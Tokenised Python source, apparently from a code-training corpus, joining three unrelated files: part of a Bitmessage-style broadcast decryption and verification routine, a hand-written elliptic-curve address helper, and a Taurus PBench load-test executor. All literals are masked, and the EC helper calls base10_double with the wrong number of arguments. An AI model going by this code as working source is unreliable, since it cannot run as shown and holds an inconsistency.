requiredPayloadLengthExtraBytes , varintLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += varintLength <EOL> logger . debug ( '<STR_LIT>' % requiredPayloadLengthExtraBytes ) <EOL> endOfPubkeyPosition = readPosition <EOL> sha = hashlib . new ( '<STR_LIT>' ) <EOL> sha . update ( sendersPubSigningKey + sendersPubEncryptionKey ) <EOL> ripeHasher = hashlib . new ( '<STR_LIT>' ) <EOL> ripeHasher . update ( sha . digest ( ) ) <EOL> calculatedRipe = ripeHasher . digest ( ) <EOL> if broadcastVersion == <NUM_LIT:4> : <EOL> if toRipe != calculatedRipe : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> elif broadcastVersion == <NUM_LIT:5> : <EOL> calculatedTag = hashlib . sha512 ( hashlib . sha512 ( encodeVarint ( <EOL> sendersAddressVersion ) + encodeVarint ( sendersStream ) + calculatedRipe ) . digest ( ) ) . digest ( ) [ <NUM_LIT:32> : ] <EOL> if calculatedTag != embeddedTag : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> messageEncodingType , messageEncodingTypeLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:9> ] ) <EOL> if messageEncodingType == <NUM_LIT:0> : <EOL> return <EOL> readPosition += messageEncodingTypeLength <EOL> messageLength , messageLengthLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:9> ] ) <EOL> readPosition += messageLengthLength <EOL> message = decryptedData [ readPosition : readPosition + messageLength ] <EOL> readPosition += messageLength <EOL> readPositionAtBottomOfMessage = readPosition <EOL> signatureLength , signatureLengthLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:9> ] ) <EOL> readPosition += signatureLengthLength <EOL> signature = decryptedData [ <EOL> readPosition : readPosition + signatureLength ] <EOL> signedData += decryptedData [ : readPositionAtBottomOfMessage ] <EOL> if not highlevelcrypto . verify ( signedData , signature , sendersPubSigningKey . encode ( '<STR_LIT>' ) ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> logger . debug ( '<STR_LIT>' ) <EOL> sigHash = hashlib . sha512 ( hashlib . sha512 ( signature ) . digest ( ) ) . digest ( ) [ <NUM_LIT:32> : ] <EOL> fromAddress = encodeAddress ( <EOL> sendersAddressVersion , sendersStream , calculatedRipe ) <EOL> logger . info ( '<STR_LIT>' % fromAddress ) <EOL> sqlExecute ( '''<STR_LIT>''' , <EOL> fromAddress , <EOL> sendersAddressVersion , <EOL> decryptedData [ : endOfPubkeyPosition ] , <EOL> int ( time . time ( ) ) , <EOL> '<STR_LIT:yes>' ) <EOL> self . possibleNewPubkey ( fromAddress ) <EOL> fromAddress = encodeAddress ( <EOL> sendersAddressVersion , sendersStream , calculatedRipe ) <EOL> with shared . printLock : <EOL> print '<STR_LIT>' , fromAddress <EOL> if messageEncodingType == <NUM_LIT:2> : <EOL> subject , body = self . decodeType2Message ( message ) <EOL> logger . info ( '<STR_LIT>' % repr ( subject ) [ : <NUM_LIT:100> ] ) <EOL> elif messageEncodingType == <NUM_LIT:1> : <EOL> body = message <EOL> subject = '<STR_LIT>' <EOL> elif messageEncodingType == <NUM_LIT:0> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> else : <EOL> body = '<STR_LIT>' + repr ( message ) <EOL> subject = '<STR_LIT>' <EOL> toAddress = '<STR_LIT>' <EOL> if helper_inbox . isMessageAlreadyInInbox ( sigHash ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> t = ( inventoryHash , toAddress , fromAddress , subject , int ( <EOL> time . time ( ) ) , body , '<STR_LIT>' , messageEncodingType , <NUM_LIT:0> , sigHash ) <EOL> helper_inbox . insert ( t ) <EOL> shared . UISignalQueue . put ( ( '<STR_LIT>' , ( <EOL> inventoryHash , toAddress , fromAddress , subject , body ) ) ) <EOL> if shared . safeConfigGetBoolean ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> try : <EOL> apiNotifyPath = shared . config . get ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> except : <EOL> apiNotifyPath = '<STR_LIT>' <EOL> if apiNotifyPath != '<STR_LIT>' : <EOL> call ( [ apiNotifyPath , "<STR_LIT>" ] ) <EOL> logger . info ( '<STR_LIT>' % ( time . time ( ) - messageProcessingStartTime , ) ) <EOL> def possibleNewPubkey ( self , address ) : <EOL> """<STR_LIT>""" <EOL> status , addressVersion , streamNumber , ripe = decodeAddress ( address ) <EOL> if addressVersion <= <NUM_LIT:3> : <EOL> if address in shared . neededPubkeys : <EOL> del shared . neededPubkeys [ address ] <EOL> self . sendMessages ( address ) <EOL> else : <EOL> logger . debug ( '<STR_LIT>' % address ) <EOL> elif addressVersion >= <NUM_LIT:4> : <EOL> tag = hashlib . sha512 ( hashlib . sha512 ( encodeVarint ( <EOL> addressVersion ) + encodeVarint ( streamNumber ) + ripe ) . digest ( ) ) . digest ( ) [ <NUM_LIT:32> : ] <EOL> if tag in shared . neededPubkeys : <EOL> del shared . neededPubkeys [ tag ] <EOL> self . sendMessages ( address ) <EOL> def sendMessages ( self , address ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' ) <EOL> sqlExecute ( <EOL> '''<STR_LIT>''' , <EOL> address ) <EOL> shared . workerQueue . put ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def ackDataHasAVaildHeader ( self , ackData ) : <EOL> if len ( ackData ) < shared . Header . size : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return False <EOL> magic , command , payloadLength , checksum = shared . Header . unpack ( ackData [ : shared . Header . size ] ) <EOL> if magic != <NUM_LIT> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return False <EOL> payload = ackData [ shared . Header . size : ] <EOL> if len ( payload ) != payloadLength : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return False <EOL> if payloadLength > <NUM_LIT> : <EOL> """<STR_LIT>""" <EOL> return False <EOL> if checksum != hashlib . sha512 ( payload ) . digest ( ) [ <NUM_LIT:0> : <NUM_LIT:4> ] : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return False <EOL> command = command . rstrip ( '<STR_LIT:\x00>' ) <EOL> if command != '<STR_LIT:object>' : <EOL> return False <EOL> return True <EOL> def addMailingListNameToSubject ( self , subject , mailingListName ) : <EOL> subject = subject . strip ( ) <EOL> if subject [ : <NUM_LIT:3> ] == '<STR_LIT>' or subject [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> subject = subject [ <NUM_LIT:3> : ] . strip ( ) <EOL> if '<STR_LIT:[>' + mailingListName + '<STR_LIT:]>' in subject : <EOL> return subject <EOL> else : <EOL> return '<STR_LIT:[>' + mailingListName + '<STR_LIT>' + subject <EOL> def decodeType2Message ( self , message ) : <EOL> bodyPositionIndex = string . find ( message , '<STR_LIT>' ) <EOL> if bodyPositionIndex > <NUM_LIT:1> : <EOL> subject = message [ <NUM_LIT:8> : bodyPositionIndex ] <EOL> subject = subject [ : <NUM_LIT> ] <EOL> body = message [ bodyPositionIndex + <NUM_LIT:6> : ] <EOL> else : <EOL> subject = '<STR_LIT>' <EOL> body = message <EOL> if subject : <EOL> subject = subject . splitlines ( ) [ <NUM_LIT:0> ] <EOL> return subject , body </s>
<s> import hashlib , re <EOL> P = <NUM_LIT:2> ** <NUM_LIT> - <NUM_LIT:2> ** <NUM_LIT:32> - <NUM_LIT:2> ** <NUM_LIT:9> - <NUM_LIT:2> ** <NUM_LIT:8> - <NUM_LIT:2> ** <NUM_LIT:7> - <NUM_LIT:2> ** <NUM_LIT:6> - <NUM_LIT:2> ** <NUM_LIT:4> - <NUM_LIT:1> <EOL> A = <NUM_LIT:0> <EOL> Gx = <NUM_LIT> <EOL> Gy = <NUM_LIT> <EOL> G = ( Gx , Gy ) <EOL> def inv ( a , n ) : <EOL> lm , hm = <NUM_LIT:1> , <NUM_LIT:0> <EOL> low , high = a % n , n <EOL> while low > <NUM_LIT:1> : <EOL> r = high / low <EOL> nm , new = hm - lm * r , high - low * r <EOL> lm , low , hm , high = nm , new , lm , low <EOL> return lm % n <EOL> def get_code_string ( base ) : <EOL> if base == <NUM_LIT:2> : return '<STR_LIT>' <EOL> elif base == <NUM_LIT:10> : return '<STR_LIT>' <EOL> elif base == <NUM_LIT:16> : return "<STR_LIT>" <EOL> elif base == <NUM_LIT> : return "<STR_LIT>" <EOL> elif base == <NUM_LIT> : return '<STR_LIT>' . join ( [ chr ( x ) for x in range ( <NUM_LIT> ) ] ) <EOL> else : raise ValueError ( "<STR_LIT>" ) <EOL> def encode ( val , base , minlen = <NUM_LIT:0> ) : <EOL> code_string = get_code_string ( base ) <EOL> result = "<STR_LIT>" <EOL> while val > <NUM_LIT:0> : <EOL> result = code_string [ val % base ] + result <EOL> val /= base <EOL> if len ( result ) < minlen : <EOL> result = code_string [ <NUM_LIT:0> ] * ( minlen - len ( result ) ) + result <EOL> return result <EOL> def decode ( string , base ) : <EOL> code_string = get_code_string ( base ) <EOL> result = <NUM_LIT:0> <EOL> if base == <NUM_LIT:16> : string = string . lower ( ) <EOL> while len ( string ) > <NUM_LIT:0> : <EOL> result *= base <EOL> result += code_string . find ( string [ <NUM_LIT:0> ] ) <EOL> string = string [ <NUM_LIT:1> : ] <EOL> return result <EOL> def changebase ( string , frm , to , minlen = <NUM_LIT:0> ) : <EOL> return encode ( decode ( string , frm ) , to , minlen ) <EOL> def base10_add ( a , b ) : <EOL> if a == None : return b [ <NUM_LIT:0> ] , b [ <NUM_LIT:1> ] <EOL> if b == None : return a [ <NUM_LIT:0> ] , a [ <NUM_LIT:1> ] <EOL> if a [ <NUM_LIT:0> ] == b [ <NUM_LIT:0> ] : <EOL> if a [ <NUM_LIT:1> ] == b [ <NUM_LIT:1> ] : return base10_double ( a [ <NUM_LIT:0> ] , a [ <NUM_LIT:1> ] ) <EOL> else : return None <EOL> m = ( ( b [ <NUM_LIT:1> ] - a [ <NUM_LIT:1> ] ) * inv ( b [ <NUM_LIT:0> ] - a [ <NUM_LIT:0> ] , P ) ) % P <EOL> x = ( m * m - a [ <NUM_LIT:0> ] - b [ <NUM_LIT:0> ] ) % P <EOL> y = ( m * ( a [ <NUM_LIT:0> ] - x ) - a [ <NUM_LIT:1> ] ) % P <EOL> return ( x , y ) <EOL> def base10_double ( a ) : <EOL> if a == None : return None <EOL> m = ( ( <NUM_LIT:3> * a [ <NUM_LIT:0> ] * a [ <NUM_LIT:0> ] + A ) * inv ( <NUM_LIT:2> * a [ <NUM_LIT:1> ] , P ) ) % P <EOL> x = ( m * m - <NUM_LIT:2> * a [ <NUM_LIT:0> ] ) % P <EOL> y = ( m * ( a [ <NUM_LIT:0> ] - x ) - a [ <NUM_LIT:1> ] ) % P <EOL> return ( x , y ) <EOL> def base10_multiply ( a , n ) : <EOL> if n == <NUM_LIT:0> : return G <EOL> if n == <NUM_LIT:1> : return a <EOL> if ( n % <NUM_LIT:2> ) == <NUM_LIT:0> : return base10_double ( base10_multiply ( a , n / <NUM_LIT:2> ) ) <EOL> if ( n % <NUM_LIT:2> ) == <NUM_LIT:1> : return base10_add ( base10_double ( base10_multiply ( a , n / <NUM_LIT:2> ) ) , a ) <EOL> def hex_to_point ( h ) : return ( decode ( h [ <NUM_LIT:2> : <NUM_LIT> ] , <NUM_LIT:16> ) , decode ( h [ <NUM_LIT> : ] , <NUM_LIT:16> ) ) <EOL> def point_to_hex ( p ) : return '<STR_LIT>' + encode ( p [ <NUM_LIT:0> ] , <NUM_LIT:16> , <NUM_LIT:64> ) + encode ( p [ <NUM_LIT:1> ] , <NUM_LIT:16> , <NUM_LIT:64> ) <EOL> def multiply ( privkey , pubkey ) : <EOL> return point_to_hex ( base10_multiply ( hex_to_point ( pubkey ) , decode ( privkey , <NUM_LIT:16> ) ) ) <EOL> def privtopub ( privkey ) : <EOL> return point_to_hex ( base10_multiply ( G , decode ( privkey , <NUM_LIT:16> ) ) ) <EOL> def add ( p1 , p2 ) : <EOL> if ( len ( p1 ) == <NUM_LIT:32> ) : <EOL> return encode ( decode ( p1 , <NUM_LIT:16> ) + decode ( p2 , <NUM_LIT:16> ) % P , <NUM_LIT:16> , <NUM_LIT:32> ) <EOL> else : <EOL> return point_to_hex ( base10_add ( hex_to_point ( p1 ) , hex_to_point ( p2 ) ) ) <EOL> def hash_160 ( string ) : <EOL> intermed = hashlib . sha256 ( string ) . digest ( ) <EOL> ripemd160 = hashlib . new ( '<STR_LIT>' ) <EOL> ripemd160 . update ( intermed ) <EOL> return ripemd160 . digest ( ) <EOL> def dbl_sha256 ( string ) : <EOL> return hashlib . sha256 ( hashlib . sha256 ( string ) . digest ( ) ) . digest ( ) <EOL> def bin_to_b58check ( inp ) : <EOL> inp_fmtd = '<STR_LIT:\x00>' + inp <EOL> leadingzbytes = len ( re . match ( '<STR_LIT>' , inp_fmtd ) . group ( <NUM_LIT:0> ) ) <EOL> checksum = dbl_sha256 ( inp_fmtd ) [ : <NUM_LIT:4> ] <EOL> return '<STR_LIT:1>' * leadingzbytes + changebase ( inp_fmtd + checksum , <NUM_LIT> , <NUM_LIT> ) <EOL> def pubkey_to_address ( pubkey ) : <EOL> return bin_to_b58check ( hash_160 ( changebase ( pubkey , <NUM_LIT:16> , <NUM_LIT> ) ) ) </s>
<s> import csv <EOL> import datetime <EOL> import json <EOL> import math <EOL> import os <EOL> import socket <EOL> import string <EOL> import struct <EOL> import subprocess <EOL> import sys <EOL> import time <EOL> import traceback <EOL> from abc import abstractmethod <EOL> from os import strerror <EOL> from subprocess import CalledProcessError <EOL> import psutil <EOL> from bzt import resources <EOL> from bzt . engine import ScenarioExecutor , FileLister , Scenario <EOL> from bzt . modules . aggregator import ResultsReader , DataPoint , KPISet , ConsolidatingAggregator <EOL> from bzt . modules . console import WidgetProvider , SidebarWidget <EOL> from bzt . six import string_types , urlencode , iteritems , parse , StringIO , b , viewvalues <EOL> from bzt . utils import shell_exec , shutdown_process , BetterDict , dehumanize_time , RequiredTool , IncrementableProgressBar <EOL> class PBenchExecutor ( ScenarioExecutor , WidgetProvider , FileLister ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( PBenchExecutor , self ) . __init__ ( ) <EOL> self . pbench = None <EOL> self . widget = None <EOL> self . start_time = None <EOL> def prepare ( self ) : <EOL> self . _prepare_pbench ( ) <EOL> reader = self . pbench . get_results_reader ( ) <EOL> if isinstance ( self . engine . aggregator , ConsolidatingAggregator ) : <EOL> self . engine . aggregator . add_underling ( reader ) <EOL> def _prepare_pbench ( self ) : <EOL> if self . settings . get ( '<STR_LIT>' , False ) : <EOL> self . log . info ( "<STR_LIT>" ) <EOL> self . pbench = TaurusPBenchTool ( self , self . log ) <EOL> else : <EOL> self . log . info ( "<STR_LIT>" ) <EOL> self . pbench = OriginalPBenchTool ( self , self . log ) <EOL> tool = PBench ( self . log , self . pbench . path ) <EOL> if not tool . check_if_installed ( ) : <EOL> self . log . info ( "<STR_LIT>" , tool . tool_name ) <EOL> tool . install ( ) <EOL> self . pbench . generate_payload ( self . get_scenario ( ) ) <EOL> self . pbench . generate_schedule ( self . get_load ( ) ) <EOL> self . pbench . generate_config ( self . get_scenario ( ) , self . get_load ( ) , self . get_hostaliases ( ) ) <EOL> self . pbench . check_config ( ) <EOL> def startup ( self ) : <EOL> self . start_time = time . time ( ) <EOL> self . pbench . start ( self . pbench . config_file ) <EOL> def check ( self ) : <EOL> if self . widget : <EOL> self . widget . update ( ) <EOL> retcode = self . pbench . process . poll ( ) <EOL> if retcode is not None : <EOL> if retcode != <NUM_LIT:0> : <EOL> self . log . info ( "<STR_LIT>" , retcode ) <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> return True <EOL> return False <EOL> def get_widget ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . widget : <EOL> proto = "<STR_LIT>" if self . pbench . use_ssl else '<STR_LIT:http>' <EOL> label = "<STR_LIT>" % ( proto , self . pbench . hostname , self . pbench . port ) <EOL> self . widget = SidebarWidget ( self , label ) <EOL> return self . widget <EOL> def shutdown ( self ) : <EOL> shutdown_process ( self . pbench . process , self . log ) <EOL> if not os . path . exists ( self . pbench . kpi_file ) or os . path . getsize ( self . pbench . kpi_file ) == <NUM_LIT:0> : <EOL> raise RuntimeError ( "<STR_LIT>" , self . pbench . kpi_file ) <EOL> def resource_files ( self ) : <EOL> resource_files = [ ] <EOL> scenario = self . get_scenario ( ) <EOL> script = scenario . get ( Scenario . SCRIPT , None ) <EOL> if script : <EOL> resource_files . append ( os . path . basename ( script ) ) <EOL> return resource_files <EOL> class PBenchTool ( object ) : <EOL> SSL_STR = "<STR_LIT>" <EOL> def __init__ ( self , executor , base_logger ) : <EOL> """<STR_LIT>""" <EOL> super ( PBenchTool , self ) . __init__ ( ) <EOL> self . log = base_logger . getChild ( self . __class__ . __name__ ) <EOL> self . executor = executor <EOL> self . engine = executor . engine <EOL> self . settings = executor . settings <EOL> self . execution = executor . execution <EOL> self . path = os . path . expanduser ( self . settings . get ( '<STR_LIT:path>' , '<STR_LIT>' ) ) <EOL> self . modules_path = os . path . expanduser ( self . settings . get ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> self . kpi_file = None <EOL> self . stats_file = None <EOL> self . config_file = None <EOL> self . payload_file = None <EOL> self . schedule_file = None <EOL> self . process = None <EOL> self . use_ssl = False <EOL> self . hostname = '<STR_LIT:localhost>' <EOL> self . port = <NUM_LIT> <EOL> self . _target = { "<STR_LIT>" : None , "<STR_LIT>" : None } <EOL> def generate_config ( self , scenario , load , hostaliases ) : <EOL> self . kpi_file = self . engine . create_artifact ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . stats_file = self . engine . create_artifact ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . config_file = self . engine . create_artifact ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> conf_path = os . path . join ( os . path . abspath ( os . path . dirname ( resources . __file__ ) ) , '<STR_LIT>' ) <EOL> with open ( conf_path ) as _fhd : <EOL> tpl = _fhd . read ( ) <EOL> instances = load . concurrency if load . concurrency else <NUM_LIT:1> <EOL> timeout = int ( dehumanize_time ( scenario . get ( "<STR_LIT>" , "<STR_LIT>" ) ) * <NUM_LIT:1000> ) <EOL> threads = <NUM_LIT:1> if psutil . cpu_count ( ) < <NUM_LIT:2> else ( psutil . cpu_count ( ) - <NUM_LIT:1> ) <EOL> threads = int ( self . execution . get ( "<STR_LIT>" , threads ) ) <EOL> if self . hostname in hostaliases : <EOL> address = hostaliases [ self . hostname ] <EOL> else : <EOL> address = socket . gethostbyname ( self . hostname ) <EOL> params = { <EOL> "<STR_LIT>" : self . modules_path , <EOL> "<STR_LIT>" : threads , <EOL> "<STR_LIT>" : self . engine . create_artifact ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : self . kpi_file , <EOL> "<STR_LIT>" : self . engine . create_artifact ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : self . execution . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT:source>" : self . _get_source ( load ) , <EOL> "<STR_LIT>" : self . SSL_STR if self . use_ssl else "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:address>" : address , <EOL> "<STR_LIT:port>" : self . port , <EOL> "<STR_LIT>" : timeout , <EOL> "<STR_LIT>" : instances , <EOL> "<STR_LIT>" : self . stats_file , <EOL> "<STR_LIT>" : self . _get_additional_modules ( ) <EOL> } <EOL> with open ( self . config_file , '<STR_LIT:w>' ) as _fhd : <EOL> substituter = string . Template ( tpl ) <EOL> _fhd . write ( substituter . substitute ( params ) ) <EOL> def generate_payload ( self , scenario ) : <EOL> script_path = scenario . get ( Scenario . SCRIPT , None ) <EOL> if script_path is not None : <EOL> self . payload_file = self . engine . find_file ( script_path ) <EOL> else : <EOL> self . payload_file = self . engine . create_artifact ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> self . log . info ( "<STR_LIT>" , self . payload_file ) <EOL> self . _generate_payload_inner ( scenario ) <EOL> @ staticmethod <EOL> def _estimate_max_progress_rps ( load , payload_count ) : <EOL> ramp_up = load . ramp_up if load . ramp_up else <NUM_LIT:0.0> <EOL> iterations = float ( load . iterations or "<STR_LIT>" ) <EOL> iteration_limit_items = iterations * payload_count <EOL> if load . iterations : <EOL> whole_rampup_items = ramp_up * load . throughput / <NUM_LIT> <EOL> rampup_items = min ( iteration_limit_items , whole_rampup_items ) <EOL> else : <EOL> rampup_items = ramp_up * load . throughput / <NUM_LIT> <EOL> rampup_iterations = rampup_items / payload_count <EOL> if load . hold and load . iterations : <EOL> hold_iterations = load . iterations - rampup_iterations <EOL> hold_iteration_limit = payload_count * hold_iterations <EOL> whole_hold_items = load . hold * load . throughput <EOL> hold_items = min ( hold_iteration_limit , whole_hold_items ) <EOL> elif load . hold and not load . iterations : <EOL> frac , _ = math . modf ( rampup_iterations ) <EOL> hold_iterations = <NUM_LIT:2> - frac <EOL> hold_iterations_items = payload_count * hold_iterations <EOL> hold_duration_items = load . hold * load . throughput <EOL> hold_items = min ( hold_iterations_items , hold_duration_items ) <EOL> else : <EOL> hold_items = <NUM_LIT:0.0> <EOL> return rampup_items + hold_items <EOL> @ staticmethod <EOL> def _estimate_max_progress_concurrency ( load , payload_count ) : <EOL> ramp_up = load . ramp_up if load . ramp_up else <NUM_LIT:0.0> <EOL> if load . iterations : <EOL> return load . iterations * payload_count <EOL> else : <EOL> if ramp_up : <EOL> instances = float ( load . concurrency ) if load . concurrency else <NUM_LIT:1.0> <EOL> concurrency_iterations = instances / payload_count <EOL> upper_iteration_limit = int ( concurrency_iterations ) + <NUM_LIT:2> <EOL> elif load . hold : <EOL> upper_iteration_limit = <NUM_LIT:2> <EOL> else : <EOL> upper_iteration_limit = <NUM_LIT:1> <EOL> return upper_iteration_limit * payload_count <EOL> def _estimate_max_progress ( self , load , payload_count ) : <EOL> if load . throughput : <EOL> return self . _estimate_max_progress_rps ( load , payload_count ) <EOL> else : <EOL> return self . _estimate_max_progress_concurrency ( load , payload_count ) <EOL> @ abstractmethod <EOL> def _write_schedule_file ( self , load , scheduler , sfd ) : <EOL> pass <EOL> def generate_schedule ( self , load ) : <EOL> self . schedule_file = self . execution . get ( "<STR_LIT>" , None ) <EOL> if self . schedule_file is None : <EOL> self . schedule_file = self . engine . create_artifact ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> self . log . info ( "<STR_LIT>" , self . schedule_file ) <EOL> with open ( self . payload_file , '<STR_LIT:rb>' ) as pfd : <EOL> scheduler = Scheduler ( load , pfd , self . log ) <EOL> with open ( self . schedule_file , '<STR_LIT:wb>' ) as sfd : <EOL> self . _write_schedule_file ( load , scheduler , sfd ) <EOL> self . log . info ( "<STR_LIT>" ) <EOL> def check_config ( self ) : <EOL> cmdline = [ self . path , '<STR_LIT>' , self . config_file ] <EOL> self . log . debug ( "<STR_LIT>" , cmdline ) <EOL> try : <EOL> subprocess . check_call ( cmdline , stdout = subprocess . PIPE ) <EOL> except CalledProcessError : <EOL> self . log . error ( "<STR_LIT>" , traceback . format_exc ( ) ) <EOL> raise <EOL> def start ( self , config_file ) : <EOL> cmdline = [ self . path , '<STR_LIT>' , config_file ] <EOL> stdout = sys . stdout if not isinstance ( sys . stdout , StringIO ) else None <EOL> stderr = sys . stderr if not isinstance ( sys . stderr , StringIO ) else None <EOL> try : <EOL> self . process = self . executor . execute ( cmdline , <EOL> stdout = stdout , <EOL> stderr = stderr ) <EOL> except OSError as exc : <EOL> self . log . error ( "<STR_LIT>" , traceback . format_exc ( ) ) <EOL> self . log . error ( "<STR_LIT>" , cmdline ) <EOL> raise RuntimeError ( "<STR_LIT>" % exc ) <EOL> def _generate_payload_inner ( self , scenario ) : <EOL> requests = scenario . get_requests ( ) <EOL> num_requests = <NUM_LIT:0> <EOL> with open ( self . payload_file , '<STR_LIT:w>' ) as fds : <EOL> for request in requests : <EOL> http = self . _build_request ( request , scenario ) <EOL> fds . write ( "<STR_LIT>" % ( len ( http ) , request . label . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) , http ) ) <EOL> num_requests += <NUM_LIT:1> <EOL> if not num_requests : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def _build_request ( self , request , scenario ) : <EOL> path = self . _get_request_path ( request , scenario ) <EOL> http = "<STR_LIT>" % ( request . method , path ) <EOL> headers = BetterDict ( ) <EOL> headers . merge ( { "<STR_LIT>" : self . hostname } ) <EOL> if not scenario . get ( "<STR_LIT>" , True ) : <EOL> headers . merge ( { "<STR_LIT>" : '<STR_LIT>' } ) <EOL> body = "<STR_LIT>" <EOL> if isinstance ( request . body , dict ) : <EOL> if request . method != "<STR_LIT:GET>" : <EOL> body = urlencode ( request . body ) <EOL> elif isinstance ( request . body , string_types ) : <EOL> body = request . body <EOL> elif request . body : <EOL> raise ValueError ( "<STR_LIT>" % ( type ( request . body ) , request . body ) ) <EOL> if body : <EOL> headers . merge ( { "<STR_LIT>" : len ( body ) } ) <EOL> headers . merge ( scenario . get ( "<STR_LIT>" ) ) <EOL> headers . merge ( request . headers ) <EOL> for header , value in iteritems ( headers ) : <EOL> http += "<STR_LIT>" % ( header , value ) <EOL> http += "<STR_LIT>" % ( body , ) <EOL> return http <EOL> def _get_request_path ( self , request , scenario ) : <EOL> parsed_url = parse . urlparse ( request . url ) <EOL> if not self . _target . get ( "<STR_LIT>" ) : <EOL> self . _target [ "<STR_LIT>" ] = parsed_url . scheme <EOL> if not self . _target . get ( "<STR_LIT>" ) : <EOL> self . _target [ "<STR_LIT>" ] = parsed_url . netloc <EOL> if parsed_url . scheme != self . _target [ "<STR_LIT>" ] or parsed_url . netloc != self . _target [ "<STR_LIT>" ] : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> path = parsed_url . path <EOL> if parsed_url . query : <EOL> path += "<STR_LIT:?>" + parsed_url . query <EOL> else : <EOL> if request . method == "<STR_LIT:GET>" and isinstance ( request . body , dict ) : <EOL> path += "<STR_LIT:?>" + urlencode ( request . body ) <EOL> if not parsed_url . netloc : <EOL> parsed_url = parse . urlparse ( scenario . get ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> self . hostname = parsed_url . netloc . split ( '<STR_LIT::>' ) [ <NUM_LIT:0> ] if '<STR_LIT::>' in parsed_url . netloc else parsed_url . netloc <EOL> self . use_ssl = parsed_url . scheme == '<STR_LIT>' <EOL> if parsed_url . port : <EOL> self . port = parsed_url . port <EOL> else : <EOL> self . port = <NUM_LIT> if self . use_ssl else <NUM_LIT> <EOL> return path if len ( path ) else '<STR_LIT:/>' <EOL> @ abstractmethod <EOL> def _get_source ( self , load ) : <EOL> pass <EOL> def get_results_reader ( self ) : <EOL> return PBenchKPIReader ( self . kpi_file , self . log , self . stats_file ) <EOL> def _get_additional_modules ( self ) : <EOL> return "<STR_LIT>" <EOL> class OriginalPBenchTool ( PBenchTool ) : <EOL> NL = "<STR_LIT:\n>" <EOL> def _write_schedule_file ( self , load , scheduler , sfd ) : <EOL> cnt = <NUM_LIT:0> <EOL> payload_entry_count = None <EOL> pbar = None <EOL> start_time = time . time ( ) <EOL> for item in scheduler . generate ( ) : <EOL> time_offset , payload_len , payload_offset , payload , marker , record_type , overall_len = item <EOL> if scheduler . iterations > <NUM_LIT:1> and payload_entry_count is None : <EOL> payload_entry_count = scheduler . count <EOL> estimated_size = self . _estimate_max_progress ( load , payload_entry_count ) <EOL> self . log . debug ( "<STR_LIT>" , estimated_size ) <EOL> if estimated_size : <EOL> pbar = IncrementableProgressBar ( maxval = estimated_size ) <EOL> pbar . catchup ( start_time , cnt ) <EOL> if time_offset < <NUM_LIT:0> : <EOL> time_offset = <NUM_LIT:0.0> <EOL> sfd . write ( b ( "<STR_LIT>" % ( payload_len , int ( <NUM_LIT:1000> * time_offset ) , marker , self . NL ) ) ) <EOL> sfd . write ( b ( "<STR_LIT>" % ( payload , self . NL ) ) ) <EOL> cnt += <NUM_LIT:1> <EOL> if pbar : <EOL> pbar . increment ( ) <EOL> self . log . debug ( "<STR_LIT>" , cnt ) <EOL> if pbar : <EOL> pbar . finish ( ) <EOL> def _get_source ( self , load ) : <EOL> return '<STR_LIT>' % self . schedule_file <EOL> class TaurusPBenchTool ( PBenchTool ) : <EOL> def _write_schedule_file ( self , load , scheduler , sfd ) : <EOL> prev_offset = <NUM_LIT:0> <EOL> accum_interval = <NUM_LIT:0.0> <EOL> cnt = <NUM_LIT:0> <EOL> payload_entry_count = None <EOL> pbar = None <EOL> start_time = time . time ( ) <EOL> for item in scheduler . generate ( ) : <EOL> time_offset , payload_len , payload_offset , payload , marker , record_type , overall_len = item <EOL> if scheduler . iterations > <NUM_LIT:1> and payload_entry_count is None : <EOL> payload_entry_count = scheduler . count <EOL> estimated_size = self . _estimate_max_progress ( load , payload_entry_count ) <EOL> self . log . debug ( "<STR_LIT>" , estimated_size ) <EOL> if estimated_size : <EOL> pbar = IncrementableProgressBar ( maxval = estimated_size ) <EOL> pbar . catchup ( start_time , cnt ) <EOL> if time_offset >= <NUM_LIT:0> : <EOL> accum_interval += <NUM_LIT:1000> * ( time_offset - prev_offset ) <EOL> interval = int ( math . floor ( accum_interval ) ) <EOL> accum_interval -= interval <EOL> else : <EOL> interval = <NUM_LIT> <EOL> type_and_delay = struct . pack ( "<STR_LIT:I>" , interval ) [ : - <NUM_LIT:1> ] + b ( chr ( record_type ) ) <EOL> payload_len_bytes = struct . pack ( '<STR_LIT:I>' , overall_len ) <EOL> payload_offset_bytes = struct . pack ( '<STR_LIT>' , payload_offset ) <EOL> sfd . 